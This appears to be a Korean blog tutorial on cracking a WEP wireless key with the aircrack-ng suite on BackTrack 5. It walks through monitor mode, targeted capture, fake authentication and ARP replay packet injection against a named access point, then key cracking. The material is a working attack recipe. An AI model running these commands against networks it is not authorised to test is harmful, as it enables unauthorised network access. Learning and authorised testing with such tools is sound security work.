티스토리 뷰
0x00. 환경구성
OS : BackTrack 5 R3 (32-bit)
Kernel : Linux bt 3.2.6
0x01. iwconfig
Configure a wireless network interface.
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces.
# iwconfig
0x02. airmon-ng
airmon-ng is script can be used to enable monitor mode on wireless interfaces.
airmon-ng <start|stop> <interface>
# airmon-ng start wlan0
0x03. airodump-ng
A wireless packet capture tool for aircrack-ng.
airodump-ng [options] <interface>
# airodump-ng mon0
To capture a specific wireless.
[Options]
-c <channel>[,<channel>[, ...]]
--channel <channel>[,<channel>[, ...]]
: Indicate the channel(s) to listen to. By default airodump-ng hop on 2.4GHz channels.
-w <prefix>
--wirte <prefix>
: Is the dump file prefix to use. If this option is not given, it will only show data on the screen. Beside this file a CSV file with the same filename as the capture will be created.
[Filter options]
-d <bssid>
--bssid <bssid>
: It will only show networks, matching the given bssid.
# airodump-ng -c 9 -d 64:e5:99:0f:38:e2 -w WEP-Key mon0
0x04. aireplay-ng
Inject packets into a wireless network to generate traffic.
The fake authentication attack.
aireplay-ng <options> <replay interface>
[Attack modes]
-1 <delay>
--fakeauth=<delay>
: The fake authentication attack allows you to perform the two types of WEP authentication(Open System and Shared Key) plus associate with the access point (AP).
[Replay options]
-e <essid>
: Fake Authentication attack
: Set target SSID.
-a <bssid>
: Set Access Point MAC address.
-h <smac>
: Set source MAC address.
# aireplay-ng -1 0 -e WEP -a 64:e5:99:0f:38:e2 -h 00:08:9f:da:bf:bf mon0
The class ARP request replay attack.
aireplay-ng <options> <replay interface>
[Attack modes]
-3
--arpreplay
: The class ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably.
[Filter options]
-b <bssid>
: MAC address of Access Point.
[replay options]
-h <bssid>
: Set Access Point MAC address.
# aireplay-ng -3 -b 64:e5:99:0f:38:e2 -h 00:08:9f:da:bf:bf mon0
0x05. aircrack-ng
A 802.11 WEP / WPA-PSK Key Cracker.
aircrack-ng [options] <.cap / .ivs file(s)>
# aircrack-ng WEP-Key-01.cap
'Tip' 카테고리의 다른 글
| gdb 실행 후 run 명령 시 user input 주는 방법 (0) | 2017.03.30 |
|---|---|
| 달력 표시하기 (0) | 2017.03.14 |
| Stop using SHA-1 (0) | 2017.02.27 |
| Kali 기본적인 설정 (패키지 관리, 한글 입력) (0) | 2016.11.04 |
| Wireless Hacking - WPA Key Crack (0) | 2016.09.04 |
| Wireless Hacking - Fake AP (0) | 2016.09.02 |
| df / du 용량 확인 (0) | 2016.06.27 |
| Bash Shell History 흔적 제거 (0) | 2016.06.20 |
| [Emacs] 시작, 이동 그리고 종료 (0) | 2016.02.19 |
| BurpSuite 특정 대상만 보기 (0) | 2016.02.08 |